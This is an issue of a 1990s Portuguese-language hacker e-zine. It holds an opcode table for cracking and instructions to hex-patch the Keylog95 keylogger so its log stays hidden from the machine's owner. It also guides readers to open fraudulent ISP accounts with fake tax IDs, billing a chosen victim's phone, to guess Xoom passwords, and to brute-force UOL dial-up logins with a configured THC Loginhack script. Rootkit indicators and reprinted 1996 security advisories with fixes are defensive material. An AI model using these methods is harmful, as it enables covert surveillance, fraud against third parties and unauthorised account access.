de dialogo Propriedades de rede.
2. Clique no botão Compartilhamento de Impressão e Arquivos.
3. Clique nas opções de compartilhamento desejadas. Uma marca de verificação
significa que o recurso está ativado. Na rede-exemplo, esse procedimento deve
ser feito nas maquinas DX266 e 486DX100. Essa caixa de diálogo indica que o
micro será compartilhado. Falta ainda dizer o que nele será compartilhado.
	Mas isso você tem capacidade de descobrir sózinho porque agora eu já
to cansado de escrever este texto e vou me deitar no sofa, vêr TV e comer
BONO. Ta com inveja né?

	Obs.:Este texto, a maior parte dele, foi tirado da revista
"INFORMÁTICA EXAME"(ou "EXAME INFORMATICA") ano 10 - Numero 117 - DEZEMBRO
/1995, páginas 110 e 111.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$             $$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  7. Crackerz  $$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$             $$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

PS1: A continuação da lista só não saiu na ultima ediçào pq eu me esqueci de
     colocar, espero que não aconteça mais.
PS2: A seção pode tah meio fraca, mas é por pouco tempo. Eu conversei com o
     Gabriel DOV(editor do zine DOV da gabscape) e ele concordou em colaborar
     para a seção Crackerz.

-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Lista de hexas (parte 4)

HEXA:		COMANDO:

28C0            SUB     AL,AL
28C1            SUB     CL,AL
28C2            SUB     DL,AL
28C3            SUB     BL,AL
28C4            SUB     AH,AL
28C5            SUB     CH,AL
28C6            SUB     DH,AL
28C7            SUB     BH,AL
28C8            SUB     AL,CL
28C9            SUB     CL,CL
28CA            SUB     DL,CL
28CB            SUB     BL,CL
28CC            SUB     AH,CL
28CD            SUB     CH,CL
28CE            SUB     DH,CL
28CF            SUB     BH,CL
28D0            SUB     AL,DL
28D1            SUB     CL,DL
28D2            SUB     DL,DL
28D3            SUB     BL,DL
28D4            SUB     AH,DL
28D5            SUB     CH,DL
28D6            SUB     DH,DL
28D7            SUB     BH,DL
28D8            SUB     AL,BL
28D9            SUB     CL,BL
28DA            SUB     DL,BL
28DB            SUB     BL,BL
28DC            SUB     AH,BL
28DD            SUB     CH,BL
28DE            SUB     DH,BL
28DF            SUB     BH,BL
28E0            SUB     AL,AH
28E1            SUB     CL,AH
28E2            SUB     DL,AH
28E3            SUB     BL,AH
28E4            SUB     AH,AH
28E5            SUB     CH,AH
28E6            SUB     DH,AH
28E7            SUB     BH,AH
28E8            SUB     AL,CH
28E9            SUB     CL,CH
28EA            SUB     DL,CH
28EB            SUB     BL,CH
28EC            SUB     AH,CH
28ED            SUB     CH,CH
28EE            SUB     DH,CH
28EF            SUB     BH,CH
28F0            SUB     AL,DH
28F1            SUB     CL,DH
28F2            SUB     DL,DH
28F3            SUB     BL,DH
28F4            SUB     AH,DH
28F5            SUB     CH,DH
28F6            SUB     DH,DH
28F7            SUB     BH,DH
28F8            SUB     AL,BH
28F9            SUB     CL,BH
28FA            SUB     DL,BH
28FB            SUB     BL,BH
28FC            SUB     AH,BH
28FD            SUB     CH,BH
28FE            SUB     DH,BH
28FF            SUB     BH,BH

29C0            SUB AX,AX
29C1            SUB CX,AX
29C2            SUB DX,AX
29C3            SUB BX,AX
29C8            SUB AX,CX
29C9            SUB CX,CX
29CA            SUB DX,CX
29CB            SUB BX,CX
29D0            SUB AX,DX
29D1            SUB CX,DX
29D2            SUB DX,DX
29D3            SUB BX,DX
29D8            SUB AX,BX
29D9            SUB CX,BX
29DA            SUB DX,BX
29DB            SUB BX,BX

2D$$**          SUB AX,**$$

40		INC AX
41              INC CX
42              INC DX
43		INC BX
48		DEC AX
49              DEC CX
4A              DEC DX
4B		DEC BX

81E9$$**        SUB CX,**$$
81EA$$**        SUB DX,**$$
81EB$$**        SUB BX,**$$

83E9**          SUB CX,+**
83EA**          SUB DX,+**
83EB**          SUB BX,+**

FEC0		INC AL
FEC1            INC CL
FEC2            INC DL
FEC3            INC BL
FEC4		INC AH
FEC5            INC CH
FEC6            INC DH
FEC7		INC BH
FEC8            DEC AL
FEC9            DEC CL
FECA            DEC DL
FECB            DEC BL
FECC            DEC AH
FECD            DEC CH
FECE            DEC DH
FECF            DEC BH

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Crackeando o Keylog95

	Moleza! Talvéz vc faça isso c o diretório onde o windos foi instalado
não for o \win. O procedimento normal do programa seria criar o diretório
\logx dentro do \win. Porém se o dir do windows não for o \win, vc deveria
criar o \win, o que seria muito suspeito e facil de ser localizado pelo dono
do programa.
	Do modo em que nós crackearemos, trocaremos o diretório \win pelo
\dos, onde estão os comandos externos do dos. Em alguns programas de insta-
lação(geralmente em protugues) o \dos é substituido pelo \windows\dos. Nesse
caso crie o diretório \dos e coloque uns textos qquer lah para que dificulte
o dono achar o file de log.
	Crackeando..
	Rode um editor hexadecimal no Keylog95.exe e procure pelo hexa:

5C 77 69 6E 5C 6C 6F 67 78
\win\logx	<--- Resultado.

	E mude para:

5C 64 6F 73 5C 6C 6F 67 78
\dos\logx	<--- Resultado.

	Agora procure pelo hexa:

5C 57 49 4E 5C 4C 4F 47 58 5C
\WIN\LOGX\	<--- Resultado.

	E mude para:

5C 44 4F 53 5C 4C 4F 47 58 5C
\DOS\LOGX\	<-- Resultado.

	Prontinho. Salve o programa e rode o programa.

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$  8. Invasão de privacidade  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Kits de hackeagem

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Root Kit

	Os principais sintomas que a instalação foi comprometida pelo RootKit

	Note que os itens 1 e 2 são default, e podem ser facilmente alterados
nas fontes.

1) Porta 31337 sendo ouvida(LISTEN) ou em uso. (Pode ser verificado, mesmo
que o programa "netstat" esteja comprometido)

2) Existencia dos seguintes arquivos:

     /dev/ptyp
     /dev/ptyq
     /dev/ptyr
     /dev/ptys

3) modificação de data e principalmente (já que o instalador mantem as datas
originais) de tamanho em alguns dos seguintes programas:

 ls
 du
 login
 chsh
 chfn
 ps
 top
 inetd
 passwd
 rshd
 netstat
 ifconfig
 syslogd

	O RootKit pode ser instalado parcialmente, portanto não há necessida-
de de todos programas estarem com os tamanhos alterados.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Demon Kit

	Foi verificada a existência de um pacote nos moldes do "rootkit".
	Este em especial é chamado DemonKit e apesar de menor que o rootkit
original, tem serviços sufientes para manter um usuário escondido do admis-
trador, além de conter um exploit (Splitvt), que permite dar ao detentor do
pacote senha de root em instalações com o splitvt vulnerável. O pacote foi
escrito originalmente para Linux, mas pode ser facilmente portado para outros
Unix, nao estando estes, portando, fora de perigo.
	Os principais sintomas que a instalação foi comprometida pelo
DemonKit. Note que os itens 1 e 2 são default e podem ser facilmente altera-
dos nas fontes.

1) Porta 6013 sendo ouvida (LISTEN) ou em uso.

2) Existência dos seguintes arquivo:
/dev/ptyq

3) Modifição de data e principalmente de tamanho, em alguns dos seguintes
programas:

 login
 identd
 netstat
 telnet
 ping

	O DemonKit pode ser instalado parcialmente, portanto nao ha' neces-
sidade de todos programas terem sido modificados.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

1995-97 © Pangéia Informática LTDA.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  9. Hack, the Art  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

	Contas fantasmas na UOL e Mandic (por Slacker)

	Aconselho a fazelas com um laptop conectado a um orelhão.
	Vou ensinar como faze-lo na MANDIC, na UOL o procedimento é identico
a não ser pelos Endereços :) .
	Conectesse a MANIC pelo telefone 2100066 (Porto Alegre) e use o login
ppp e a senha novo.
	Acesse a pagina de cadastro(http://www.mandic.cadastro.com.br , eu
acho). Complete o formulario com dados falsos. Aqui vão alguns dos dados
muito importantes que você deve colocar nos devidos lugares:

* CPF : Coloque um CPF falso, para isso vc precisará de um gerador a mão.
* Forma de pagamento : Débito na conta telefonica, e coloque um numero qquer.
* Cartão de credito : Não coloque nada.

	Se quizer sacanear um otario, preencha os dados deles. No final do
mes ele se resolve com a conta telefonica e os cara da MANDIC.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hackeando a XOOM por dedução.

	Fiz uma média de que 1 de cada 30 usuários da xoom usam a senha igual
ao login, ou senhas tipo "homepage" e "page". Para descobrir o login é moleza
!!!

	http://members.xoom.com/cszine
				^^^^^^---Esse é meu login.

	Ae vc vai na seção de usuarios da xoom e tenta:
user : cszine
pass : cszine
ERROR
user : cszine
pass : homepage
ERROR
user : cszine
pass : page
OK (É ruin heim)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hackeando provedores com o Loginhack v1.00 da THC

	O que esse programa faz é conectar-se ao provedor e testar as diver-
sas senhas de uma wordlist para consegir estabelecer uma conexão.
	Primeiro vc deve acertar seu script. Eu uso o Dec-serv feito pelo
Tron X e que jah vem por default com o programa. Edite-o e mude as linhas

init_modem=z
init_data=8n1
LOGFILE=xxxxxx.log
PHONE_NR=xxxxxx
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=word.dic

	Para:

init_modem=atz
init_data=8n1
LOGFILE=uol.log
PHONE_NR=2100045
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=wordlist.dic

	Acima estão as configurações necesarias para hackear a uol. Mude-as
adequadamente ao seu provedor. Para compila-lo use o Lh-comp.exe assim:

lh-comp dec-serv.txt

	Isso criará o dec-serv.scr .
	Agora rode o programa. Se ainda precisar configurar os dados acima
entre no Setup. Se está tudo certo selecione Load compiled Script [L]. Ae
quando pedir o nome do script digite ? para lista-los. Então digite o nome
do script(se fez tudo certo será dec-serv.scr).
	Após carregar o script digite S para iniciar. Pronto! Agora é só
esperar que talvéz demore um pouco.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  10. ¡¡¡¡BoNuS!!!!  $$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

	Antes de proceguir gostaria de informar que alguns dados foram extra-
idos dos boletins por serem extremamente sem importancia.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim de 1996 da Lista de Segurança da Pangéia Informática

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 001

18 de Agosto de 1996
Tópico: Vulnerabilidade em Resolv+

	Foi verificada uma vulnerabilidade na biblioteca resolv+, usada por
todos os programas que usam resolução de nomes tais como: ping, telnet, rsh,
ssh e muitos outros.
	Esta vulnerabilidade permite a um usuário local ler qualquer arquivo
do sistema incluindo /etc/shadow, e qualquer outro que o usuário root tenha
permissão para ler, já que estes programas rodam com o suid ligado.

1. Descrição

	Programas como ftp, netscape e outros tem que permitir ao usuário
comum usar determinados recursos do sistema, como sockets por exemplo. Uma
maneira pratica de permitir isso é ligar o suid dos executáveis, esta solução
em si não representa nenhum risco a segurança da instalação.

2. Impacto

	Foi observado que, em determinadas circunstâncias, esta característi-
ca pode permitir a um usuário comum ler um arquivo com permissões de leitura
restritas ao root.
	Esta vulnerabilidade existe na biblioteca resolv+, que em alguns
sistemas é incluida na biblioteca libc (Linux, por exemplo).

3. Solução

	Esta vulnerabilidade NÃO foi observada nos seguintes sistemas:
. HP-UX 10.0
. AIX 3.5
. SunOS (sem a lib resolv+ separada) e Solaris 2.5
. OSF1 3.2
. Distribuicoes de Berkeley
. SCO Unix 3.2v4.2 e 3.2v5.0.0
	Mas FOI encontrada em Linux rodando varias versões da libc, incluindo
a mais recente (libc-5.3.12), as mais novas versões de kernel incluido a mais
recente (2.0.13).
	Note que isso não elimina a possibilidade desta existir em outros
sistemas Unix não testados.
	A única maneira de eliminar esta condição foi gerar uma nova libc,
alterando o código que continha o problema. A solução encontrada podera ser
melhor implementada em futuras versões, caso consiga maior cooperação.
	As bibliotecas libc-5.3.12 para Linux estáticas e dinamicas estão
disponíveis em: ftp://ftp.pangeia.com.br/pub/seg/libs
	Onde:
libc.a - biblioteca estática (a.out)
libc.so.5.3.12 - biblioteca dinamica (shared)
libc.md5 - assinatura das bibliotecas

	Para os programas que usam bibliotecas dinamicas nada precisa ser
alterado, apenas copie a libc.so.5.3.12 para o diretorio /lib, e rode o pro-
grama ldconfig. Nos casos de a.out (estáticos) é necessário copiar a libc.a e
recompilar os programas que usam a resolv+.

	Nota: É recomendado que se atualize as bibliotecas libm
(libm.so.5.0.6) e libpthreads (libpthreads.so.1.60.4) e respectivos objetos
relacionados.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 002

21 de Agosto de 1996
Tópico: Vulnerabilidade em rwhod

	Verificada um vulnerabilidade no servidor rwhod, que disponibiliza
informações sobre uma determinada máquina, que podem ser observados usando
clientes como rwho e ruptime.
Este serviço utiliza UDP para transporte das informações entre máquinas.

1. Impacto:

	Foi observado que usuários remotos, usando esta falha, podem inter-
romper o serviço rwho e/ou ganhar acesso (inclusive de root) em uma máquina
que esteja rodando este serviço.

2. Solução:

	Esta vulnerabilidade foi verificada nos seguintes sistemas: OpenBSD,
NetBSD, FreeBSD, AIX e TODAS as distribuições Linux, incluindo as mais recen-
tes. Outras plataformas NÃO foram examinadas, portanto NÃO está descartada a
possibilidade do problema tambem ocorrer.
	O pacote com fontes e executável para Linux ELF, eliminando a vulne-
rabilidade está disponível em:
ftp://ftp.pangeia.com.br/pub/seg/pac/rwhod.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 003

26 de Agosto de 1996
Topico: Vulnerabilidade em cfingerd e outros fingerd

	Verificada uma vulnerabilidade no servidor cfingerd, que disponibi-
liza informações sobre uma determinada maquina e/ou um determinado usuário,
as quais podem ser observados usando o cliente finger.
	Este serviço permite a um usuário remoto obter informações sobre
usuários locais tais como: nome de login, nome real, data e hora do último
acesso, tty, shell e chave pública, entre outros.

1. Impacto:

	Foi observado que, existindo uma determinada entrada no arquivo
/etc/cfinger.conf, um usuário local pode ler arquivos que não teria acesso
como usuário comum, como por exemplo o /etc/shadow, ou ter acesso a disposi-
tivos como /dev/console ou /dev/kmem.

2. Solução:

	Esta vulnerabilidade ocorrerá em todas as plataformas onde o servidor
cfinger tiver sido compilado.
	O problema pode ser minimizado alterando-se o dono do serviço de root
para nobody, no arquivo /etc/inetd.conf.
	Visto que o servidor cfinger, tem algumas algumas limitações, e' AL-
TAMENTE recomendado a sua substituição pelo pacote ffingerd. Foi verificado
um pequeno problema com a versão anterior do pacote ffinger, que uma vez
comunicado, foi prontamente corrigido pelo autor.
	O pacote ffingerd está disponível em:
ftp://ftp.pangeia.com.br/pub/seg/pac/ffingerd-1.12.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 004

27 de Agosto de 1996
Tópico: Vulnerabilidade em Pine3.9[1-4]

	Verificada uma vulnerabilidade no programa Pine, que permite a lei-
tura de mails e news em ambiente Unix, OS/2 e DOS. Esta vulnerabiliade permi-
te a um usuário local obter acesso a conta de qualquer usuário quando da
execução do programa Pine, inclusive o root.

1. Impacto:

	Foi observada uma falha no leitor de mail e news Pine, em relação a
criação de arquivos temporários. Permitindo que um usuário obtenha acesso,
(privilegiado ou não) dependendo do usuário que vier a executar o programa
Pine.

2. Solução:

	Esta vulnerabilidade ocorrerá em todas as plataformas Unix onde o
Pine versoes 3.91, 3.92, 3.93 e 3.94 tiver sido compilado.
	A versao 3.95 corrige este problema.
	O pacote pine-3.95 está disponível em:
ftp://ftp.pangeia.com.br/pub/seg/pac/pine-3.95.ELF.tgz
ftp://ftp.pangeia.com.br/pub/seg/pac/pine3.95.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 005

27 de Agosto de 1996
Tópico: Vulnerabilidade em PKGTOOL

	Verificada uma vulnerabilidade no programa pkgtool, que permite a
instalação/remoção de pacotes na distribuição Slackware 3.0 do Linux. Esta
vulnerabilidade permite a um usuário local obter acesso a conta de qualquer
usuário quando da execução do programa pkgtool, inclusive o root.

1. Impacto:

	Foi observada uma falha no programa de instalação de pacotes PKGTOOL,
na criação de arquivos temporarios. Como é normalmente o usuário root que
instala/remove pacotes, um usuario comum usando esta vulnerabilidade, poderá
obter acesso privilegiado em uma instalação local.

2. Solução:

	Esta vulnerabilidade foi testada na distribuição slackware 3.0, não
esta descartada a possibilidade da mesma ocorrer em outras versões da mesma
distribuição. O problema foi corrigido e o procedimento de instalação é
simplesmente copiar o programa "cpkgtool" para o diretório "/usr/lib/setup",
que está simbolicamente ligado a "/sbin/pkgtool".
	O pacote pgktool está disponível em:
ftp://ftp.pangeia.com.br/pub/seg/pac/cpktool

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 006

3 de Setembro de 1996
Tópico: Vulnerabilidade em TIN

	Verificada uma vulnerabilidade no programa tin, que permite a leitura
de news locais e remotos (rtin ou tin -r) em várias plataformas. Esta vulne-
rabilidade permite a um usuário local obter acesso a conta de qualquer usuá-
rio quando da execução do programa tin, inclusive o root.

1. Impacto:

	Foi observada uma falha no programa de leitura de news locais e remo-
tos tin na criação de arquivos temporários. Atraves dela um usuário local
poderá obter acesso privilegiado em uma instalação.

2. Solução:

	Esta vulnerabilidade foi verificada em TODAS as versoes do programa
tin, inclusive na última (1.2 PL2), compilados em TODAS as plataformas onde
ele está disponível.
	Uma forma simples de resolver este problema é recompilar o programa,
incluindo ou alterando a seguinte linha no programa Makefile:
COPTS = -c -O -DDONT_LOG_USER
	O pacote tin com a correção também está disponível em:
ftp://ftp.pangeia.com.br/pub/seg/pac/tin-1.22.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Boletim 007

13 de Setembro de 1996
Tópico: Vulnerabilidade em vários shells.

       Verificada uma vulnerabilidade nos shells padrão Bourne, entre outros.
Esta vulnerabilidade permite a um usuário local mascarar um determinado co-
mando ou usar artifícios para obter privilegios em uma instalação.

1. Impacto:

	Foi observada uma falha em alguns shell que permite a um usuário,
induzir alteraçòes na execução de um script, para atraves destas ler arquivos
aos quais não teria permissão ou conseguir privilegios no sistema.
	Note que esta não é uma falha grave, mas requer atenção.

2. Solução:

	Esta vulnerabilidade NAO foi verificada nas seguintes plataformas:
. Linux
. HP-UX
. BSD
	Mas o FOI nas seguintes plataformas:
. SunOs
. Solaris
. AIX
. OSF
. SCO OpenServer

	Use para verificar o problema:

$ sh -c 'echo SIM ^ cat'
$ SIM <---- Contêm a falha

Se:

$ sh -c 'echo SIM ^ cat'
$ SIM ^ cat <---- NÃO contêm a falha.

	A solução é optar por shells padrão Posix e desativar, caso seja
possível, os shells onde a falha for verificada.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Agradecimentos:

	Pouca cooperação foi conseguida para conseguir identificar as máqui-
nas afetadas com o problema, meus sinceros agradecimentos a:

Joao Cesar da Escossia (escossia@npd1ufes.br)
Klaus Steding-Jessen (jessen@dcc.unicamp.br)
Pedro Vazquez (vazquez@iqm.unicamp.br)
Ricardo Nassif (rn@emacs.bluesky.net)

1995-96 © Pangéia Informática LTDA.
http://www.pangeia.com.br/faq

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

        Bem por hoje e' soh pessoal!
        Eu encontrei uma porcao de novas zines na inet entre elas: PSICOCYBER
, WOH ZINE, COUNT DOWN e ALZINE. Se eu abrisse um espaco na page para todas
naum iria sobrar nada pra cszine, por isso que eu vou apenas publicar a page
das devidas zines.

PSICOCYBER
http://www.angelfire.com/id/psicocyber

WOH ZINE
http://www.geocities.com/Athens/Acropolis/7632/

COUNT DOWN
http://www.geocities.com/Pentagon/Quarters/3673

ALZINE
http://www.geocities.com/siliconvalley/way/7029

        Okz? Eu faco isso pq sei como eh ainda estar por baixo naum ser o
conhecido. Espero que facam por mim o mesmo que eu faco por vcs.
        Se vc esta comecando uma zine, mail-me que eu terei prazer em ajudar
a divulga-lo.
